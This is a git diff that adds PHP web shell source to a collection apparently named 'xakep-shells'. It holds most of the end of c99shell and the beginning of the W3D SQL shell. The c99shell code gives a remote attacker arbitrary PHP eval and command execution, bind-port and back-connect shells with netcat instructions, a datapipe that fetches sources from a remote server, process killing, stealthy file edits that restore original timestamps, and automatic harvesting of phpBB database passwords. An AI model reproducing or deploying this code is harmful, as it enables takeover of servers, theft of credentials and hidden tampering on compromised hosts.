+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\">icq</a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/xakep-shells/PHP/w3d.php.php.txt b/xakep-shells/PHP/w3d.php.php.txt
new file mode 100644
index 0000000..f9d2213
--- /dev/null
+++ b/xakep-shells/PHP/w3d.php.php.txt
@@ -0,0 +1,128 @@
+<?php
+/*
+W3D Shell
+By: Warpboy
+www.private-node.net
+Version: 0x01
+Info: Created specifically for straight-foreward SQL interaction.
+Planned updates: More features, easier interaction with database(s)
+*/
+
+//Store User Input
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$dbn = $_POST['db'];
+$host = "localhost";
+
+//Comprehend Change
+if($_REQUEST['change']) {
+setcookie("user", "$user", time()+3600);
+setcookie("pass", "$pass", time()+3600);
+setcookie("db", "$dbn", time()+3600);
+}
+//Define cookies in vars
+$username = $_COOKIE["user"];
+$password = $_COOKIE["pass"];
+$database = $_COOKIE["db"];
+
+//build header
+echo '<title>W3D Shell // By: Warpboy \\\ SQL Shell</title>';
+echo '
+<font color=#00CC00><body bgcolor=black>
+<center><table border=0 cellpadding=0 cellspacing=0 width=50% style=font-size: 14px; font-family: Arial;>
+<tr><td bgcolor=#00CC00><center><font size="3" face="Verdana"><b>W3D SQL Shell</font></tr></td>
+<tr><td><font color=#FFFFFF><center><b><font size="1" face="Georgia"><marquee speed=1>By: Warpboy</td></font></tr>
+';
+echo '
+<tr><td><font color=#00CC00><center><b><br>[]Database Info[]</td></tr><tr><td><font color=#FFFFFF><b><pre><br>
+<center>
+<form action="w3d.php" method="post">
+Username: <input type="text" name="user" </input>
+Password: <input type="text" name="pass" />
+Database: <input type="text" name="db" />
+<input type="submit" value="Change" name="change"  />
+</form>    </tr></td><table>
+';
+echo '
+<form action="w3d.php" method="get">
+<b><font color=#00CC00><br>Query:</font></b> <input type="text" name="query" size="65"/>
+<input type="submit"  />
+</form>';
+
+//Initial pre-cookie
+$con = @mysql_connect($host, $user, $pass);
+if (!$con){
+ //secondary post-cookie
+ $con1 = @mysql_connect($host, $username, $password);
+ if(!$con1) {
+ echo "<br><b><font color=#00CC00>Currently not connected.<br>";
+ }
+ }
+
